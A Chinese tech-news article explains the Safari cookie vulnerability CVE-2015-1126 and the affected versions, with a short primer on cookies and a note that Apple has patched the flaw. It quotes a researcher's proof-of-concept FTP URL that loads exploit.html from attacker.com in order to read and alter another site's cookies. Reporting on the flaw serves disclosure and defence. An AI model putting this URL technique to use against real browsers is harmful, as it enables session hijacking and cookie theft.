存在于Safari瀏覽器中的一個(gè)cookie訪問漏洞(CVE-2015-1126)可能會影響數(shù)十億蘋果產(chǎn)品,如果你在使用Safari瀏覽器,一定要盡快檢測它是否受該漏洞影響,若受影響請盡快修復(fù)。
科普:cookie
Cookie,有時(shí)也用其復(fù)數(shù)形式Cookies,指某些網(wǎng)站為了辨別用戶身份、進(jìn)行session跟蹤而儲存在用戶本地終端上的數(shù)據(jù)(通常經(jīng)過加密)。Cookie可以保持登錄信息到用戶下次與服務(wù)器的會話,即下次訪問同一網(wǎng)站時(shí),用戶不必再次輸入用戶名和密碼就可以登錄。
Cookies最典型的應(yīng)用是判定注冊用戶是否已經(jīng)登錄網(wǎng)站,用戶可能會得到提示,是否在下一次進(jìn)入此網(wǎng)站時(shí)保留用戶信息以便簡化登錄手續(xù),這些都是Cookies的功用。另一個(gè)重要應(yīng)用場合是“購物車”之類處理,用戶可能會在一段時(shí)間內(nèi)在同一家網(wǎng)站的不同頁面中選擇不同的商品,這些信息都會寫入Cookies,以便在最后付款時(shí)提取信息。
漏洞詳情
前段時(shí)間,芬蘭一家公司Klikki Oy的安全研究員Jouko Pynnnen發(fā)現(xiàn)了Safari瀏覽器中存在安全漏洞(CVE-2015-1126),該漏洞可能會影響數(shù)十億蘋果產(chǎn)品。該跨域漏洞會影響Safari的URL文件傳輸機(jī)制,攻擊者可以精心制作一個(gè)web網(wǎng)頁,當(dāng)受害者訪問該頁面時(shí),就可以繞過一些正常的跨域限制,然后訪問或操作任何網(wǎng)站的HTTP cookies。
Pynnnen在一份安全報(bào)告中寫道:
“攻擊者可以精心編制一個(gè)web頁面,當(dāng)目標(biāo)網(wǎng)民訪問該頁面時(shí),攻擊者就可以繞過一些正常的跨域限制從而訪問或操作任何網(wǎng)站的HTTP cookies。大多數(shù)允許用戶登錄的網(wǎng)站都會在cookies中存儲它們的認(rèn)證信息(通常是會話ID等信息),攻擊者訪問這些cookies就可以劫持認(rèn)證會話。在iOS、OS X和Windows系統(tǒng)上所有Safari的測試版本都受該漏洞影響,產(chǎn)品總量可能達(dá)到十億數(shù)量級。”
研究人員解釋道,iOS 8.1、6.1.6及OS X 10.9.3和Windows8.1系統(tǒng)上的7.0.4和5.1.7版本的Safari瀏覽器都受到該漏洞的影響。
漏洞PoC URL
目前針對此漏洞,在URL中的用戶名或密碼字段編碼特殊字符就可能引發(fā)安全問題,示例鏈接如下所示。
ftp://user:password@host/path
當(dāng)用戶名或密碼字段中包含編碼的特殊字符時(shí),通過操作該URL,攻擊者可以下載目標(biāo)網(wǎng)站的文檔資料。Pynnnen還提供了下面的示例PoC URL:
ftp://user%40attacker.com%2Fexploit.html%[email protected]/
當(dāng)受害者訪問該URL時(shí),存在此漏洞的Safari瀏覽器會加載攻擊者所控制網(wǎng)站attacker.com上的exploit.html文件,之后攻擊者便會利用JavaScript訪問和操作apple.com網(wǎng)站的cookies。受影響的瀏覽器會將上面URL解碼成如下形式:
ftp://[email protected]/exploit.html#apple.com/
即在一個(gè)正常的web頁面中嵌入指向一個(gè)FTP URL的IFRAME,這樣就可以發(fā)起攻擊了。
漏洞已修復(fù)
該漏洞已經(jīng)被蘋果公司修復(fù),使用Safari瀏覽器的用戶可以使用Safari cookie漏洞檢測工具來檢測其瀏覽器是否受影響,若受影響一定要盡快修復(fù)它。